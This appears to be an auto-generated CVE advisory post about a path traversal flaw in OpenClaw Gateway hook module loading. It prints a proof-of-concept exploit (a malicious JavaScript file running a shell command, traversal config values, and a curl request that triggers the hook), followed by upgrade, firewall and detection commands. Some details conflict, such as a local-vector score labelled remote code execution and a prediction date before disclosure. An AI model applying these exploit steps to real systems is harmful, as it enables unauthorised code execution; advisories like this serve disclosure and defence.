OpenClaw Gateway, Path Traversal, CVE-2026-XXXXX (High)

Listen to this Post

The OpenClaw Gateway versions from 2026.1.5 up to 2026.2.13 contain a high-severity vulnerability where the software fails to properly validate user-supplied paths for hook transform modules before passing them to Node.js dynamic import(). This insufficient path constraint allows an attacker with configuration modification privileges to supply path traversal sequences (e.g., ../../../etc/passwd) or absolute paths to the `hooks.mappings[].transform.module` or `hooks.internal.handlers[].module` configuration values . When the gateway processes these hooks, it executes the `import()` statement on the attacker-specified path, loading and executing arbitrary local JavaScript files from the filesystem. This results in remote code execution within the context of the Node.js gateway process. The vulnerability is classified under CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) and requires high privileges to exploit, typically through access to gateway configuration endpoints .

dailycve form:

Platform: OpenClaw Gateway
Version: 2026.1.5-2026.2.13
Vulnerability : Path Traversal
Severity: High
date: 2026-02-18

Prediction: 2026-02-14

What Undercode Say:

Analytics:

  • CVSS Score: 8.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
  • CWE: CWE-22 (Path Traversal)
  • EPSS Probability: 0.04% (12th percentile)
  • Exploit Maturity: Proof of Concept available

Exploit:

Example malicious configuration demonstrating path traversal
Set malicious module path via gateway config
cat > malicious.js << 'EOF'
console.log('Exploited: Code execution achieved');
require('child_process').execSync('id > /tmp/pwned');
EOF
Path traversal payload to load malicious.js from /tmp
Set hooks.mappings[].transform.module = "../../../../../../tmp/malicious"
Alternative: Absolute path payload
hooks.mappings[].transform.module = "/tmp/malicious"
Trigger the vulnerable hook (method depends on gateway interaction)
curl -X POST https://victim-gateway/hooks/trigger \
-H "Authorization: Bearer <token>" \
-d '{"hook":"vulnerable-hook"}'

Protection from this CVE:

Immediate mitigation: Upgrade to patched version
npm install [email protected]
If upgrade impossible, restrict access
Block external access to config endpoints
iptables -A INPUT -p tcp --dport 8443 -j DROP Example gateway port
Audit existing configurations for unsafe values
grep -E 'transform.module|handlers[].module' /path/to/openclaw/config.yaml
Monitor for exploitation attempts
tail -f /var/log/openclaw/gateway.log | grep -E 'import(|module.(..\/|\/etc\/|\/tmp\/)'
Verify patch installation
npm list openclaw | grep 2026.2.14

Impact:

Successful exploitation allows attackers to achieve remote code execution in the Node.js gateway process, leading to full system compromise, data exfiltration, and potential lateral movement within the network. The vulnerability has high confidentiality, integrity, and availability impact .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top